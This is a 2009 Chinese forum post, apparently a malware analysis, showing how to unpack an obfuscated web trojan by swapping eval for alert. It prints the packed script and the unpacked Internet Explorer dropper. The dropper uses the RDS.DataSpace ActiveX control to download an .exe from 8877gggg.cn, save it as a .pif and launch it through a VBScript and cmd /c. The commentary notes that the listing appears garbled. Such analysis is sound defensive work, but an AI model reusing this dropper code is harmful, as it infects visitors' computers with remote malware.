关于:hxxp://mmmbbcc.cn/1/14.htm解密的日志(全体输出- 2):
Level 0>http://mmmbbcc.cn/1/14.htm
Level 1>http://8877gggg.cn/1.exe ●
先把脚本开头的eval换成alert,这样解包后的代码只会以文本形式弹出显示,而不会被执行:
- <script>
// Analysis step: this is the packed script with its leading eval() swapped for
// alert(), so the unpacked text is displayed instead of being executed.
// The wrapper has the function(p,a,c,k,e,d) shape of the widely used "packer"
// obfuscator: p is the encoded payload, a (62) the radix, c (105) the number of
// dictionary entries and k the '|'-separated dictionary. Each token in p is
// replaced by k[index] through the \b-anchored RegExp; tokens whose dictionary
// entry is empty are left unchanged.
// Only the final eval is neutralised: the unpacker function still runs in the
// browser, so open the saved file in an isolated analysis VM.
// Triage hint: the dictionary stays in clear text even while packed. Strings
// such as 'FileSystemObject', 'SaveToFile', 'ShelLExeCute', 'exe' and '8877gggg'
// are readable here before any unpacking is done.
- alert(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1w="1F";3 k,i,q,6,g;J=\'1C://1x.1y/1.D\';3 F=\'z.1z\';3 y=\'z.15\';3 5=1j["1f"]["17"]("1h");3 v="1i:";3 C="0-1e-0";3 I="1d";3 G="19";3 8="18";3 B="1a-1b-1c";3 E="1A.X"+"M"+"L"+"H"+"T"+"T"+"P";3 K="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";3 x="10.";3 w="12";3 N=x+w;3 8=v+8+B+C+I+G;5["16"]("1g",8);3 s$h=5["7"]("1G.1k","");3 9=5["7"](E,"");3 4;4=5.7(K,"");4.Q=1;3 f=s$h.1B(0);3 u;u=5["7"](N,"");R=s$h["1E"](f+\'\\\\1D\',\'11.D\');6=f+"\\\"+F;9.l("1o",J,0);9["1m"]();4["l"]();4["1l"](9["1p"]);4["1q"](6,2);4["U"]();3 1u="5";g=f+"\\\"+y;3 j;j="1r 6 = 7(\"13.";k="10\")"+"\\n";i="6.1s \"11 /c "+6+"\",1t";q=j+k+i;4["Q"]=2;4["l"]();4["1n"]=q;4["1v"](g,2);4["U"]();3 Y="o";3 V="p";3 W="e";3 O="n";3 Z=Y+V+W+O;u.14(R,\' /c \'+g,"",Z,0)',62,105,'|||var|Gameee3|chilam|wwwGameeecn|CreateObject|Gameeeeex|Gameee2||||||VgDnZXHt7|wwwGameeecn2|R6|Gameeezfs|Gameeezf0|Gameeezf|Open|||||Gameeezfx||hHf||sghgdddd|Gameeeee|yings|ying|Gameeenames|Gameeeeee||Gameeeeexx|Gameeeees|exe|Gameeexml|Gameeename|Gameeeeesss||Gameeeeess|Gameee|Gameeeado|||yingx|Gameeessss||type|exp1|||Close|Gameeess|Gameeesss||Gameees|Gameeex|Shell|cmd|Application|Wscript|ShelLExeCute|vbs|setAttribute|createElement|BD96C|FC29E36|556|65A3|11D|0C04|983A|document|classid|object|clsid|window|FileSystemObject|Write|send|WriteText|GET|responseBody|SaveToFile|Set|run|vbhide|Gameeeuser|Savetofile|tnnn|8877gggg|cn|pif|Microsoft|GetSpecialFolder|http|system32|BuildPath|unnn|Scripting'.split('|'),0,{}))
- </script>
然后保存为任意名称的 .html 文件,在浏览器里打开,就会弹框;不用选定文本,直接按 Ctrl+C 就可以复制出弹框内容,得到解包后的脚本:
-
// Unpacked payload: the text that eval() would have executed. Read statically,
// it is a download-and-execute dropper aimed at Internet Explorer:
//  1. Creates an <object> element and sets its classid to a CLSID assembled
//     from fragments: clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 (the
//     RDS.DataSpace control). Its CreateObject() is then used to instantiate
//     Scripting.FileSystemObject, Microsoft.XMLHTTP, Adodb.Stream and
//     Shell.Application. The CLSID and ProgIDs are built by concatenation,
//     presumably to defeat plain string matching.
//  2. Issues a synchronous GET (third Open argument is 0) for
//     hxxp://8877gggg[.]cn/1.exe and writes responseBody through a binary
//     stream (type=1) to <GetSpecialFolder(0)>\Gameeeeee.pif with SaveToFile
//     option 2. GetSpecialFolder(0) is the Windows directory.
//  3. Switches the stream to text (type=2) and saves a two-line VBScript as
//     Gameeeeee.vbs in the same folder: CreateObject("Wscript.Shell"), then
//     .run "cmd /c <pif path>",vbhide.
//     NOTE(review): WriteText is assigned here rather than called; confirm
//     against the original sample whether the listing is exact.
//  4. Calls ShellExecute on the Shell.Application object with
//     <Windows dir>\system32\cmd.exe, arguments " /c <vbs path>", verb "open"
//     and window style 0.
// Indicators visible in this listing: the download URL above, the file names
// Gameeeeee.pif and Gameeeeee.vbs in the Windows directory, and cmd.exe being
// launched with "/c" on a .vbs path from the browser context.
// NOTE(review): as displayed this is not valid JavaScript. Escape characters
// appear to have been lost, e.g. VgDnZXHt7+"\"+Gameeename and the nested quotes
// inside the VBScript strings, probably by the forum rendering. Treat it as a
// transcript, not as an exact copy of the sample.
- tnnn="unnn";var Gameeezf,Gameeezfs,Gameeezfx,wwwGameeecn,wwwGameeecn2;Gameee='http://8877gggg.cn/1.exe';var Gameeename='Gameeeeee.pif';var Gameeenames='Gameeeeee.vbs';var chilam=window["document"]["createElement"]("object");var Gameeeee="clsid:";var Gameeeees="0-983A-0";var Gameeeeess="0C04";var Gameeeeesss="FC29E36";var Gameeeeex="BD96C";var Gameeeeexx="556-65A3-11D";var Gameeexml="Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P";var Gameeeado="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";var ying="Shell.";var yings="Application";var yingx=ying+yings;var Gameeeeex=Gameeeee+Gameeeeex+Gameeeeexx+Gameeeees+Gameeeeess+Gameeeeesss;chilam["setAttribute"]("classid",Gameeeeex);var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","");var Gameee2=chilam["CreateObject"](Gameeexml,"");var Gameee3;Gameee3=chilam.CreateObject(Gameeeado,"");Gameee3.type=1;var VgDnZXHt7=hHf$R6.GetSpecialFolder(0);var sghgdddd;sghgdddd=chilam["CreateObject"](yingx,"");exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','cmd.exe');wwwGameeecn=VgDnZXHt7+"\"+Gameeename;Gameee2.Open("GET",Gameee,0);Gameee2["send"]();Gameee3["Open"]();Gameee3["Write"](Gameee2["responseBody"]);Gameee3["SaveToFile"](wwwGameeecn,2);Gameee3["Close"]();var Gameeeuser="chilam";wwwGameeecn2=VgDnZXHt7+"\"+Gameeenames;var Gameeezf0;Gameeezf0="Set wwwGameeecn = CreateObject("Wscript.";Gameeezf="Shell")"+"\n";Gameeezfs="wwwGameeecn.run "cmd /c "+wwwGameeecn+"",vbhide";Gameeezfx=Gameeezf0+Gameeezf+Gameeezfs;Gameee3["type"]=2;Gameee3["Open"]();Gameee3["WriteText"]=Gameeezfx;Gameee3["Savetofile"](wwwGameeecn2,2);Gameee3["Close"]();var Gameees="o";var Gameeess="p";var Gameeesss="e";var Gameeessss="n";var Gameeex=Gameees+Gameeess+Gameeesss+Gameeessss;sghgdddd.ShelLExeCute(exp1,' /c '+wwwGameeecn2,"",Gameeex,0)
[ 本帖最后由 aarwwefdds 于 2009-1-1 17:38 编辑 ] |